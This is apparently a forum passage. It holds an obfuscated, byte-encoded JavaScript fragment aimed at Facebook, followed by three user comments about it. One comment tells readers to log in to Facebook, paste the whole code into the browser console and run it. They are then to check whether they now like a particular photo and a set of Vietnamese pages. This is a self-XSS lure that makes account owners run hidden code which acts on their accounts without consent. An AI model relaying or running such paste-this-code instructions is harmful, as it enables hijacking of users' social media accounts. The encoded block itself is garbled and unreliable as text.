d98\xfdc8\xfdc8\xfdc8\xfd99\xfd93\xfdd0\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb8\xfd93\xfda6\xfd93\xfdc7\xfdc1\xfdcd\xfd93\xfdb8\xfdb1\xfdb0\xfdae\xfdcb\xfdcb\xfdc8\xfdb4\xfdc1\xfdc9\xfdcc\xfdc1\xfdca\xfdcb\xfd98\xfd99\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb8\xfdb6\xfdb4\xfdb0\xfd93\xfda6\xfd94\xfd9d\xfd9d\xfdcd\xfdcd\xfdcd\xfd9c\xfdc2\xfdbe\xfdc0\xfdc1\xfdbf\xfdc8\xfdc8\xfdc5\xfd9c\xfdc0\xfdc8\xfdc6\xfd9d\xfdbe\xfdc4\xfdbe\xfdce\xfd9d\xfdcc\xfdc2\xfdc4\xfd9d\xfdc6\xfdc4\xfdc5\xfdc1\xfd9c\xfdc8\xfdc3\xfdc8\xfd94\xfda5\xfd93\xfdcc\xfdbe\xfdca\xfd93\xfdb8\xfdb3\xfdbe\xfdca\xfdbe\xfdc6\xfdca\xfd93\xfda6\xfd93\xfd94\xfdc6\xfdc4\xfdc5\xfdc1\xfdbd\xfdbe\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfda6\xfdcb\xfdca\xfdcc\xfdc1\xfd97\xfdc2\xfdcb\xfdbd\xfdc1\xfdc7\xfdcb\xfdbd\xfdc4\xfdc0\xfdc1\xfdc7\xfdcb\xfdc4\xfdc2\xfdc4\xfdc1\xfdca\xfda6\xfd94\xfd9a\xfdc8\xfdc8\xfdc8\xfd9a\xfd94\xfd97\xfdca\xfdc8\xfdcc\xfdca\xfdc0\xfdc1\xfda6\xfd9e\xfd97\xfdc0\xfdc6\xfdc4\xfdc1\xfdc7\xfdcb\xfdbd\xfdc4\xfdc0\xfda6\xfd94\xfd9a\xfdc7\xfdc8\xfdcd\xfd9a\xfd94\xfd96\xfda0\xfda9\xfda0\xfda2\xfda4\xfda2\xfda3\xfda0\xfda3\xfda1\xfda2\xfd97\xfdca\xfdc8\xfdc8\xfdcb\xfdc4\xfdc0\xfda6\xfdcc\xfdbd\xfdc4\xfdca\xfdc8\xfdc7\xfdc8\xfdbd\xfda0\xfda4\xfdbd\xfd9e\xfda3\xfd97\xfdc2\xfdc4\xfdc2\xfdcb\xfdc8\xfdc0\xfdc0\xfdbe\xfdca\xfdc4\xfdc8\xfdc7\xfd97\xfdc2\xfdcb\xfdba\xfdcb\xfdc7\xfdbc\xfda6\xfd96\xfda0\xfdac\xfd96\xfda0\xfdab\xfd97\xfdc2\xfdcb\xfdba\xfdcb\xfdce\xfdc8\xfdc1\xfdbc\xfda6\xfd9f\xfd9e\xfd97\xfdc2\xfdcb\xfdba\xfdc9\xfdc4\xfdc0\xfdbc\xfda6\xfda1\xfda3\xfda4\xfd9e\xfda3\xfd9e\xfd9e\xfda0\xfd9f\xfda4\xfda0\xfda2\xfd9e\xfd9f\xfda2\xfda4\xfd9f\xfda1\xfda2\xfd97\xfdc2\xfdcb\xfdba\xfdc6\xfdc2\xfdbd\xfdca\xfdcb\xfdc8\xfdca\xfdce\xfdbd\xfdc5\xfdc1\xfdce\xfdbc\xfda6\xfd9f\xfda3\xfd9e\xfda0\xfda4\xfda2\xfd9f\xfda4\xfd9e\xfd9e\xfd9e\xfda4\xfda0\xfd9e\xfda0\xfda0\xfda4\xfda1\xfd9f\xfd97\xfdc2\xfdcb\xfdba\xfdc3\xfdbe\xfdca\xfdbd\xfdc1\xfdce\xfdc8\xfdbe\xfdc7\xfdc0\xfdc1\xfdc0\xfdbd\xfdcc\xfdc2\xfdc4\xfdbc\xfda6\xfd9e\xfd97\xfdc7\xfdc0\xfdcb\xfdca\xfdba\xfdbd\xfdc6\xfdc8\xfdc0\xfdbc\xfda6\xfdc8\xfdbe\xfdc2\xfdc1\xfdc6\xfdc1\xfdcb\xfdbd\xfdc3\xfdc8\xfdc6\xfdc1\xfdbd\xfdca\xfdcb\xfdca\xfdc1\xfdbe\xfdc6\xfd97\xfdbd\xfdbd\xfdcc\xfdca\xfdc1\xfdca\xfda6\xfd94\xfd9a\xfdcc\xfdca\xfdc1\xfdca\xfdbd\xfdc4\xfdc0\xfd9a\xfd94\xfd97\xfdbd\xfdbd\xfdbe\xfda6\xfd9e\xfd97\xfdbd\xfdbd\xfdc0\xfdce\xfdc7\xfda6\xfda2\xfdc7\xfda3\xfda3\xfdb4\xfdc8\xfda9\xfdb1\xfdaa\xfdc6\xfdaa\xfdc6\xfdce\xfdc8\xfdc0\xfdc8\xfdbe\xfdc1\xfd97\xfdbd\xfdbd\xfdca\xfdc1\xfdc9\xfda6\xfdc2\xfda0\xfd97\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfda6\xfd94\xfd9a\xfdc2\xfdbf\xfdbd\xfdc0\xfdcb\xfdca\xfdc2\xfd9a\xfd94\xfd97\xfdc8\xfdc3\xfdca\xfdcb\xfdbe\xfdc6\xfdc8\xfda6\xfd94\xfda5\xfd93\xfdb8\xfd9c\xfdc8\xfdc8\xfdc1\xfdc7\xfd98\xfd94\xfdb3\xfdb2\xfdb5\xfdb6\xfd94\xfd9b\xfd93\xfdb8\xfdb6\xfdb4\xfdb0\xfd9b\xfd93\xfdcb\xfdca\xfdcc\xfdc1\xfd99\xfda5\xfd93\xfdb8\xfd9c\xfdc8\xfdc7\xfdca\xfdc1\xfdbe\xfdc0\xfdce\xfdca\xfdcb\xfdbe\xfdcb\xfdc1\xfdc0\xfdc3\xfdbe\xfdc7\xfdc2\xfdc1\xfd93\xfda6\xfd93\xfdc2\xfdcc\xfdc7\xfdc0\xfdcb\xfdc4\xfdc8\xfdc7\xfd93\xfd98\xfd99\xfd93\xfdd0\xfd93\xfdc4\xfdc2\xfd93\xfd98\xfdb8\xfd9c\xfdca\xfdc1\xfdbe\xfdc0\xfdce\xfdb5\xfdcb\xfdbe\xfdcb\xfdc1\xfd93\xfda6\xfda6\xfd93\xfda0\xfd93\xfd97\xfd97\xfd93\xfdb8\xfd9c\xfdca\xfdcb\xfdbe\xfdcb\xfdcc\xfdca\xfd93\xfda6\xfda6\xfd93\xfd9f\xfd9e\xfd9e\xfd99\xfd93\xfdd0\xfd93\xfdb8\xfd9c\xfdc0\xfdc6\xfdc8\xfdca\xfdc1\xfda5\xfd93\xfdd1\xfd93\xfdd1\xfda5\xfd93\xfdb8\xfd9c\xfdca\xfdc1\xfdc7\xfdc0\xfd98\xfdb8\xfdb3\xfdbe\xfdca\xfdbe\xfdc6\xfdca\xfd99\xfda5\xfd93\xfdd1\xfd93\xfd84\xfd9d\xfd9d\xfdb0\xfdc8\xfdc7\xfdc2\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfd9e\xfda1\xfda4\xfda4\xfd9e\xfda0\xfd9e\xfda4\xfda1\xfda2\xfda2\xfda3\xfda2\xfda2\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfd9f\xfda2\xfda0\xfda2\xfd9e\xfda2\xfda3\xfda0\xfd9e\xfda4\xfda2\xfda1\xfda4\xfda2\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfd9e\xfda1\xfda3\xfda2\xfda2\xfda4\xfd9e\xfda1\xfd9f\xfda1\xfda2\xfda4\xfda3\xfda1\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfd9e\xfda4\xfda0\xfd9f\xfda3\xfda1\xfd9e\xfda1\xfda4\xfd9e\xfd9e\xfda3\xfd9f\xfda1\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdae\xfdc4\xfdc1\xfdcc\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfda1\xfd9f\xfda2\xfda0\xfda0\xfda3\xfda3\xfda0\xfda2\xfda0\xfd9f\xfd9f\xfda1\xfda4\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfda1\xfd9e\xfda1\xfd9f\xfda0\xfda3\xfda4\xfd9f\xfda4\xfda1\xfda0\xfd9f\xfda1\xfda3\xfd9f\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfda0\xfda4\xfda1\xfd9e\xfd9e\xfd9e\xfd9f\xfda2\xfda0\xfda3\xfda4\xfd9e\xfda2\xfda3\xfd9f\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfda0\xfda4\xfd9e\xfd9e\xfda0\xfd9e\xfda2\xfda4\xfda2\xfda2\xfda0\xfd9e\xfd9e\xfda2\xfd9f\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfda0\xfda4\xfd9e\xfda2\xfda2\xfd9e\xfd9f\xfda0\xfd9e\xfd9e\xfd9e\xfd9e\xfda0\xfda1\xfd9e\xfd94\xfd99\xfda5\xfd84\xfdb3\xfd98\xfd94\xfda0\xfd9f\xfda3\xfda0\xfd9e\xfda1\xfda3\xfd9f\xfda0\xfda4\xfd9e\xfda0\xfda1\xfda2\xfd9e\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb5\xfdc8\xfdc0\xfdbe\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9e\xfda0\xfda4\xfda1\xfd9e\xfd9f\xfda4\xfda1\xfda0\xfd9e\xfda2\xfd9f\xfda0\xfda1\xfda0\xfda2\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb6\xfdc3\xfdbe\xfdc4\xfdb5\xfdc8\xfdc7\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfda0\xfda0\xfd9e\xfda2\xfda2\xfda0\xfd9f\xfd9f\xfda0\xfd9e\xfda0\xfda2\xfda0\xfda0\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb3\xfdc3\xfdcc\xfdb0\xfdc8\xfdce\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9f\xfd9e\xfda0\xfd9f\xfda2\xfda3\xfda3\xfda0\xfda0\xfd9e\xfda2\xfd9e\xfd9e\xfd9e\xfd9e\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdab\xfdbe\xfdc7\xfdc2\xfdae\xfdbe\xfdc4\xfdb3\xfdc3\xfdc8\xfdc7\xfdc2\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfda0\xfda4\xfda0\xfd9e\xfda0\xfda1\xfda3\xfda1\xfd9e\xfda3\xfd9f\xfd9f\xfda0\xfda0\xfd9e\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb6\xfdc3\xfdc4\xfdad\xfdc4\xfdbe\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9e\xfda2\xfda3\xfda2\xfd9e\xfda2\xfd9e\xfda0\xfd9e\xfd9e\xfd9e\xfda0\xfda3\xfda2\xfd9f\xfd94\xfd99\xfda5\xfd84\xfd9d\xfd9d\xfdb6\xfdc4\xfdc6\xfdac\xfdc6\xfdb3\xfdc4\xfdc0\xfd84\xfdb3\xfd98\xfd94\xfd9e\xfda0\xfd9e\xfd9e\xfda2\xfda4\xfd9e\xfda2\xfda1\xfda1\xfda3\xfd9e\xfda2\xfda4\xfda1\xfda1\xfd94\xfd99\xfda5`

Comment: I didn't know that this code was that complicated. No one could directly point out the 22 pages.

Comment: The code doesn't do anything with "22 pages" since the code is broken.

Comment: Did you try it your own? Log in facebook (using Google Chrome), F12 > console tab > paste the whole code in > Enter. Then go to this link https://www.facebook.com/photo.php?fbid=169527529919889&set=a.113085705564072.1073741826.100005879291858&type=1 see if you ever liked that photo. :P sorry if my English sounds weird, I'm learning. Then open the list of pages that you already liked and see if there are vietnamese pages. If yes, the code work perfectly. Tell me if it doesn't.